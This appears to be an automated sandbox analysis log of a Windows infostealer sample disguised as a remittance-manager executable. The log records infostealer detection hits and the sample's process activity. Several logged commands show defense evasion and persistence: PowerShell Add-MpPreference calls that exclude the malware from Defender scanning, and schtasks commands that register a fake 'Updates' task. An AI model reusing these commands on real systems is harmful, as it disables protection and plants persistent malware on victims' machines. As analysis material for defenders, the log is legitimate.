                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_00BFDC740_2_00BFDC74
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_04B200060_2_04B20006
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_04B200400_2_04B20040
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_04B271B00_2_04B271B0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A4C5900_2_06A4C590
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A46E480_2_06A46E48
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A464980_2_06A46498
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A444D00_2_06A444D0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A44D400_2_06A44D40
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A448F80_2_06A448F8
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 0_2_06A449080_2_06A44908
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0294B7979_2_0294B797
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0294EAB89_2_0294EAB8
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_02944AC09_2_02944AC0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_02943EA89_2_02943EA8
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_029441F09_2_029441F0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_068FCA589_2_068FCA58
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_068F9DD09_2_068F9DD0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0691B4389_2_0691B438
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069130209_2_06913020
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0691C1009_2_0691C100
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069151589_2_06915158
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069161709_2_06916170
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069178F09_2_069178F0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069172109_2_06917210
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0691234B9_2_0691234B
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069100069_2_06910006
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_069100409_2_06910040
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_0691585F9_2_0691585F
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_0273DC7411_2_0273DC74
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A1B7B011_2_06A1B7B0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A16E4811_2_06A16E48
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A1649811_2_06A16498
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A144D011_2_06A144D0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A14D4011_2_06A14D40
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A148F811_2_06A148F8
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 11_2_06A1490811_2_06A14908
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_0122B7F814_2_0122B7F8
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_0122AB7814_2_0122AB78
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_01224AC014_2_01224AC0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_01223EA814_2_01223EA8
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_012241F014_2_012241F0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE235814_2_06CE2358
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE78F014_2_06CE78F0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CEB1A014_2_06CEB1A0
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE515814_2_06CE5158
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE617014_2_06CE6170
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CEC10014_2_06CEC100
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE721014_2_06CE7210
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CEE31014_2_06CEE310
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE004014_2_06CE0040
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE587014_2_06CE5870
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeCode function: 14_2_06CE001D14_2_06CE001D
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.0000000002581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee437cb3d-4ee3-47da-90a1-2184c71e8c7c.exe4 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.000000000260A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee437cb3d-4ee3-47da-90a1-2184c71e8c7c.exe4 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000000.2077798168.0000000000290000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameyuZb.exe@ vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2121838053.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2131424313.0000000006D10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2131624756.000000000807F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2130681757.0000000004EA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534288426.000000000043E000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamee437cb3d-4ee3-47da-90a1-2184c71e8c7c.exe4 vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534785774.00000000009B8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exeBinary or memory string: OriginalFilenameyuZb.exe@ vs GestorRemesasCONFIRMIMING.exe
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 14.2.XNYbGrcoFr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b4d470.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: XNYbGrcoFr.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, kGWv.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, 84Zwl.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, Z80kh.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, R7VqEELv.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, iWM.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, tHB.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, YGTyRx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, YGTyRx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, YGTyRx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, YGTyRx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, C31OK3DSYLts9Kn2AE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, eKV2kFx6gl2oLwtuEY.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.6d10000.8.raw.unpack, C31OK3DSYLts9Kn2AE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.GestorRemesasCONFIRMIMING.exe.396afe0.3.raw.unpack, eKV2kFx6gl2oLwtuEY.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeMutant created: \Sessions\1\BaseNamedObjects\knaoSbEVtdAgcuCGDyzxVaRSzY
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCF9B.tmpJump to behavior
                    Source: GestorRemesasCONFIRMIMING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: GestorRemesasCONFIRMIMING.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: GestorRemesasCONFIRMIMING.exeReversingLabs: Detection: 63%
                    Source: GestorRemesasCONFIRMIMING.exeVirustotal: Detection: 57%
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeFile read: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess created: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
